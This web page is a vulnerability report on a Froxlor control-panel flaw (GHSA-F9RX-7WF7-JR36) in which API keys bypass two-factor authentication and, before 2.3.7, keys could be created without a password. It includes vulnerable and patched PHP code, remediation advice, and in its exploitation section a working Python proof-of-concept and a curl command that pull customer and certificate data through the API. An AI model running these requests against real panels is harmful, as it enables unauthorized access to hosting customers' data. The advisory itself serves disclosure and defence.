CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-F9RX-7WF7-JR36

GHSA-F9RX-7WF7-JR36: Two-Factor Authentication Bypass and Passwordless API Key Creation in Froxlor

Alon Barad
Alon Barad
Software Engineer

Jun 3, 2026·5 min read·10 visits

Executive Summary (TL;DR)

Froxlor's API endpoint completely omits Two-Factor Authentication status checks. Attackers possessing an API key can execute administrative commands on 2FA-protected accounts. Additionally, versions prior to 2.3.7 allowed passwordless generation of these keys.

An architectural flaw in the Froxlor server administration control panel allows attackers to completely bypass Two-Factor Authentication (2FA) by issuing commands directly through the API. The API authentication routine in 'FroxlorRPC::validateAuth' fails to check the account's 2FA status, enabling arbitrary execution of administrative and customer actions. Furthermore, in versions prior to 2.3.7, API keys could be created without validating the current user password, exposing users to persistent backdoor access via session hijacking or CSRF.

Vulnerability Overview

Froxlor is an open-source server administration control panel used to manage web hosting environments. The software implements two main communication vectors for administrative and customer actions: an interactive web-based User Interface (UI) and a programmatic API endpoint located at /api.php.

While the web UI enforces Two-Factor Authentication (2FA) via time-based one-time passwords (TOTP), the programmatic API relies on key-based authentication. This multi-channel architecture introduces a security mismatch if authorization logic is not kept consistent across both channels.

The vulnerability cataloged under GHSA-F9RX-7WF7-JR36 details an authentication bypass flaw within the API subsystem. Because the API route does not verify the active 2FA state of an account, an attacker possessing an API key can completely bypass MFA, exposing a broad administrative attack surface.

Root Cause Analysis

The fundamental flaw resides within the API authentication routine implemented in lib/Froxlor/Api/FroxlorRPC.php inside the private static method validateAuth.

When a request is submitted to /api.php, authentication parameters are evaluated. The verification routine queries the database to match the incoming key and secret, verifying permissions and expiration parameters:

private static function validateAuth(string $key, string $secret): bool
{
    $sel_stmt = Database::prepare("
        SELECT ak.*, a.api_allowed as admin_api_allowed,
               c.api_allowed as cust_api_allowed, c.deactivated
        FROM `api_keys` ak
        LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid
        LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid
        WHERE `apikey` = :ak AND `secret` = :as
    ");
    // ... checks expiration and permissions ...
}

This validation process confirms key validity but completely neglects the type_2fa column or TOTP state of the associated user. Thus, the database query checks permission flags but omits multi-factor authentication constraints.

This behavior is compounded by a flaw in api_keys.php where users could generate API keys without re-entering their account password. Consequently, an attacker utilizing Cross-Site Request Forgery (CSRF) or a hijacked session could generate persistent API credentials to establish a permanent backdoor.

Code Analysis and Patch Evaluation

In versions of Froxlor prior to 2.3.7, creating a new API key in api_keys.php only required a simple POST request with a confirmation token, lacking authentication checks:

// Vulnerable logic in api_keys.php
} elseif ($action == 'add') {
	if (Request::post('send') == 'send') {
		$ins_stmt = Database::prepare("
			INSERT INTO `" . TABLE_API_KEYS . "` SET
			`apikey` = :key, `secret` = :secret, `adminid` = :aid, `customerid` = :cid, `valid_until` = '-1', `allowed_from` = ''
		");

To remediate this key-generation vector, the maintainers implemented password verification inside the key generation path of version 2.3.7:

// Patched logic in api_keys.php
$user_passwd = Request::post('user_password');
if (empty($user_passwd)) {
	Response::dynamicError(lng('panel.noauthentication'));
}
if ($userinfo['adminsession']) {
	$table = "`" . TABLE_PANEL_ADMINS . "`";
	$uid = 'adminid';
} else {
	$table = "`" . TABLE_PANEL_CUSTOMERS . "`";
	$uid = 'customerid';
}
if (\Froxlor\System\Crypt::validatePasswordLogin($userinfo, $user_passwd, $table, $uid)) {
	// Cryptographically secure API key generation follows
	$key = hash('sha256', openssl_random_pseudo_bytes(64 * 64));
	$secret = hash('sha512', openssl_random_pseudo_bytes(64 * 64 * 4));
	// ... database insert executes ...
} else {
	Response::dynamicError(lng('panel.authenticationfailed'));
}

While this fix prevents unauthorized creation of new API keys via CSRF or hijacked sessions, the underlying architectural bypass remains if an existing API key is exposed. The API route itself does not incorporate a secondary factor, meaning any leaked key continues to offer 2FA-bypass access by design.

Exploitation and Attack Methodology

An attacker can exploit this vulnerability by routing requests directly to the API endpoint, completely bypassing the interactive 2FA checks on /index.php.

To demonstrate this bypass, an attacker can use the following Python script to retrieve customer listings from a 2FA-protected account without supplying a TOTP token:

import sys
import requests
import urllib3
 
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
if len(sys.argv) < 4:
    print(f"Usage: {sys.argv[0]} <target_url> <api_key> <api_secret>")
    sys.exit(1)
 
target = sys.argv[1].rstrip('/')
key = sys.argv[2]
secret = sys.argv[3]
api_url = f"{target}/api.php"
payload = {"command": "Customers.listing", "params": {}}
 
try:
    r = requests.post(api_url, auth=(key, secret), json=payload, verify=False, timeout=10)
    data = r.json()
    if "data" in data and "list" in data["data"]:
        print(f"[+] Success: Bypassed 2FA. Retrieved records:")
        for customer in data["data"]["list"]:
            print(f"Username: {customer.get('loginname')} | Email: {customer.get('email')}")
except Exception as e:
    print(f"[-] Error: {e}")

Alternatively, direct commands can be sent using curl to extract database credentials or certificates:

curl -s -u "KEY:SECRET" -H "Content-Type: application/json" -d '{"command":"Certificates.listing","params":{}}' https://panel.example.com/api.php

Impact Assessment

The impact of this authentication bypass is high because the Froxlor API exposes more than 165 functions. This exposure grants a threat actor extensive read and write capabilities over the hosting platform.

Attackers can modify DNS zone files to conduct domain hijacking, read database access details, alter mail routing, and exfiltrate customer databases. Access to SSL private keys is also possible through the API.

In multi-tenant shared-hosting deployments, compromising a single administrative credential grants full control over other hosted customers, making this vulnerability highly consequential for hosting providers.

Remediation and Mitigation

To fully resolve this security issue, administrators must upgrade Froxlor to version 2.3.7 or higher, which introduces password-validation checks for API key generation.

After applying the update, administrators must conduct an audit of all active API keys. It is recommended to revoke and regenerate existing API credentials, particularly for accounts utilizing 2FA.

Where upgrading cannot be performed immediately, administrators should implement IP whitelisting or disable access to /api.php at the web server configuration level to restrict API usage to authorized origins.

Official Patches

FroxlorFroxlor Security Release 2.3.7
FroxlorFroxlor Comparison Diff containing authentication patches

Technical Appendix

CVSS Score
8.1/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Affected Systems

Froxlor Server Administration Control Panel

Affected Versions Detail

Product
Affected Versions
Fixed Version
Froxlor
Froxlor
< 2.3.72.3.7
AttributeDetail
CWE IDCWE-287
Attack VectorNetwork
CVSS v3.18.1
Exploit StatusProof of Concept
KEV StatusNot Listed

MITRE ATT&CK Mapping

T1110Brute Force
Credential Access
T1556Modify Authentication Process
Credential Access
CWE-287
Improper Authentication

The software does not prove or insufficiently proves that a user is who they claim to be.

Known Exploits & Detection

Froxlor Technical Security Research ReportProof of Concept script demonstrating the extraction of customer data bypassing the 2FA requirement

Vulnerability Timeline

Official advisory released under identifier GHSA-F9RX-7WF7-JR36
2026-06-03
Froxlor security update 2.3.7 published resolving authentication bypass
2026-06-03

References & Sources

  • [1]Official GitHub Security Advisory GHSA-F9RX-7WF7-JR36
  • [2]GitHub Advisory Database Entry
  • [3]Related Advisory

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 17 hours ago•GHSA-8RQH-VXPR-X77P
4.3

GHSA-8RQH-VXPR-X77P: Stored Cross-Site Scripting via MIME Type Spoofing in Plone REST API

A stored Cross-Site Scripting (XSS) vulnerability exists within plone.restapi, the REST API package for Plone content management system. By supplying a spoofed input MIME type (text/x-html-safe), an attacker can mislead the rendering layer (plone.app.textfield) into assuming that the supplied content is already sanitized. This causes the system to skip the safe_html transform, allowing arbitrary JavaScript to execute in the victim's browser when they view the compromised page.

Amit Schendel
Amit Schendel
6 views•7 min read
•about 18 hours ago•CVE-2026-11400
8.0

CVE-2026-11400: Privilege Escalation via Untrusted Search Path in AWS Advanced JDBC Wrapper

An untrusted search path vulnerability in the GlobalDatabasePlugin component of the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL allows authenticated, low-privilege database users to hijack administrative session queries. By defining a custom function in a writable schema such as the public schema, an attacker can hijack queries executed automatically during driver-level topology detection. When a highly privileged database user connects to the database utilizing an affected version of the wrapper, the custom function executes under their security context, enabling remote privilege escalation to rds_superuser.

Alon Barad
Alon Barad
7 views•6 min read
•about 19 hours ago•CVE-2026-27771
8.2

CVE-2026-27771: Authentication Bypass and Information Disclosure in Gitea Container and Composer Registries

CVE-2026-27771 represents a critical security flaw in Gitea and Forgejo (up to and including version 1.26.1) involving missing authorization checks (CWE-862). Unauthenticated remote attackers can query, enumerate, and download private container images from the OCI-compliant container registry. Additionally, unauthorized users can retrieve private or internal source repository URLs via the Composer package registry metadata API. A public proof-of-concept exists, and threat metrics indicate highly active scanning and exploitation risks.

Alon Barad
Alon Barad
7 views•7 min read
•about 20 hours ago•GHSA-CVPC-HCCG-WMW4
8.8

GHSA-CVPC-HCCG-WMW4: Missing Authorization in Formie Administrative Settings Allows Privilege Escalation

A missing authorization vulnerability in the Formie plugin for Craft CMS prior to version 3.1.28 allows low-privileged Control Panel users to read and modify sensitive administrative settings, configuration options, and third-party integrations.

Amit Schendel
Amit Schendel
5 views•6 min read
•about 21 hours ago•CVE-2026-53598
7.5

CVE-2026-53598: Arbitrary File Read via File Reference Expansion in Microsoft Prompty

CVE-2026-53598 is a directory traversal and arbitrary file read vulnerability in Microsoft Prompty ecosystem loaders across multiple languages. Prior to version 2.0.0-beta.2, the loaders resolved `${file:...}` reference strings inside frontmatter configuration blocks without enforcing that the target file paths resided within authorized directories. This deficiency allows an attacker-controlled configuration file to read sensitive operating system and application files through absolute paths, directory traversal, or symbolic link escapes. The issue is addressed across the Python, C#, Node.js/TypeScript, and Rust ecosystems.

Amit Schendel
Amit Schendel
7 views•6 min read
•about 22 hours ago•GHSA-MFR4-MQ8W-VMG6
7.3

GHSA-MFR4-MQ8W-VMG6: Path Traversal in proot-distro copy Command Allows Container Escape

A directory traversal vulnerability exists in the copy subcommand of the proot-distro utility. Due to incomplete path sanitization, local attackers or malicious scripts can read from or write to arbitrary files outside the container rootfs, bypassing isolation barriers and potentially gaining unauthorized access or persistent execution on the host system.

Alon Barad
Alon Barad
7 views•7 min read